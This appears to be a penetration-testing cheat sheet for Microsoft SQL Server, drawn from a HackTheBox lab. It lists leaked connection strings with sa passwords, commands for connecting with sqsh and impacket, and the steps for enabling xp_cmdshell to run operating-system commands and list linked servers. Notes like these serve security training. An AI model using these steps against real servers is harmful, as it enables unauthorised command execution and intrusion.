MSSQL

SQL Server is common service when exposed to the outer world.
Requires: With valid credentials commands can be executed on the victim

Identifying Passwords

# from tally htb
SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#[email protected];
​
# example format
PROVIDER=DNOSCPDB;DATA SOURCE=HOME;User ID=sa;PWD=cyb3rs3cn00b;DATABASE=rfdb

Connecting to server

# sqsh -S $ip -U sa -P $pass
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#[email protected]"
​
# via mysqlclient
impacket-mssqlclient -db orcharddb -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine
​

Code Execution

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
xp_cmdshell 'whoami';
go
​
# Check for linked servers
sp_linkedservers
go